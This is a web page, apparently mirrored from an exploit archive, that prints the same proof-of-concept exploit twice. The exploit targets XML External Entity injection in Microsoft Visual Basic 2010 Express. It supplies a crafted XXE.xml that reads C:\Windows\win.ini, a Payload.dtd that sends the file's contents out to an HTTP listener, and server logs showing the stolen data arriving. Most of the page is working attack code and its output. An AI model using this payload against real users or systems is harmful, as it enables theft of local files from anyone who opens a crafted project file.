扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 |
# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection # Exploit Author: ZwX # Exploit Date: 2019-12-03 # Version Software : 10.0.30319.1 RTMRel # Vendor Homepage : https://www.microsoft.com/ # Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express # Tested on OS: Windows 7 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software Microsoft Visual Basic 2010 5) Drag the file (.xml) in a VB project 6) External Entity Injection Successful [+] XXE.xml : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 - Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt # Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection # Exploit Author: ZwX # Exploit Date: 2019-12-03 # Version Software : 10.0.30319.1 RTMRel # Vendor Homepage : https://www.microsoft.com/ # Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express # Tested on OS: Windows 7 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software Microsoft Visual Basic 2010 5) Drag the file (.xml) in a VB project 6) External Entity Injection Successful [+] XXE.xml : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 - |
体验盒子
